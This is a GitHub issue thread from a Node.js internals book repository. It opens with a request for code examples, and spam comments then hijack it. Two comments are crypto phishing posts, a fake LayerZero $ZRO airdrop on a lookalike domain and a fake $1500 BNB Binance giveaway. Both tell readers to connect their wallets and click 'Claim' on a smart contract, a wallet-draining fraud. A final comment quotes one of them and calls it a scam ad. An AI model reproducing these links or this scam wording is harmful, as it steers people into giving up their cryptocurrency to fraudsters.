### ISSUE TITLE
希望可以补下代码示例

### ISSUE THREAD

**Issue by chenjigeng** [yjhjstz/deep-into-node#38]
希望可以补下代码示例~

**Comment by yjhjstz** [comment]
哪个章节的？

**Comment by bpieres** [comment]
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

![Claim Now](https://i.ytimg.com/vi/s7BR96pg0SA/sddefault.jpg)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.

**Comment by UserHuRu** [comment]
邮件已成功收到啦～胡茹茹

**Comment by BhavyClover** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by XLCYun** [comment]
> # Binance Airdrop Guide: Claim Your $1500 in BNB Now!
> Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!
> 
> [![Claim Now](https://camo.githubusercontent.com/8251fc1c02ddbd7f2cc0237f6f10fd031056cd108a8e1670d762a6e77f6aa79b/68747470733a2f2f692e7974696d672e636f6d2f76692f50466847447958737461732f6d617872657364656661756c742e6a7067)](http://go.bnbcoinsearn.online/97Q7Yj)
> 
> ## Steps to Claim:
> ### 1. Connect Your Binance Wallet:
> * Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
> * Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
> 
> ### 2. Interact with the Contract:
> * Once your wallet is connected.
> * Click on the "**Claim**" button to interact with the smart contract.
> 
> Don't miss out on your $1500 in BNB! Act now to secure your tokens.
> 
> Winners: @

怎么现在诈骗广告还做到github issure评论区来了
